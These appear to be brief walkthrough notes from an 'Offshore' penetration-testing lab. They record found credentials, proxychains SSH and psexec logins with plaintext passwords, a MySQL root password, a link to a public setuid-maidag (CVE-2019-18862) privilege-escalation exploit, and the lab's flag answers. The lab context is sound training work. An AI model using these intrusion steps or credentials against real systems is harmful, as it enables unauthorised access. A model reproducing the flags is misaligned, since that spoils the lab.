Look up the CLIENT_BANKING user in BloodHound:
**Old admin account for client banking app** OFFSHORE{h1dd3n_1n_pl@iN_$1ght}
Going to the box:
proxychains ssh client_banking@172.16.4.120 :::: h1dd3n_1n_pl@iN_$1ght
mysql -u root -h localhost -p :::: toor
CLIENT_BANKING to ROOT (CVE-2019-18862, setuid-root maidag from GNU Mailutils; LD_PRELOAD variant of the exploit):
https://github.com/bcoles/local-exploits/blob/master/CVE-2019-18862/exploit.ldpreload.sh
Flags:
1: Your eyes aren't deceiving you :::: OFFSHORE{h1dd3n_1n_pl@iN_$1ght}
2: It happened again :::: OFFSHORE{d0nt_tru$t_y0ur_us3rs}
3: We don't need no stinkin' encryption :::: OFFSHORE{3ncrypt10n_w0rk$_w0nd3rs}
4: MinatoTW leaves his mark :::: OFFSHORE{a$$ert1on_r1fl3!!!}
5: The grand finale ::::: OFFSHORE{s3tuid_f0r_th3_k1ll_sh0t!}
shell on WS03 (172.16.2.102) as magic:
proxychains psexec.py 'magic:1ts-mag1c!!!'@172.16.2.102 cmd.exe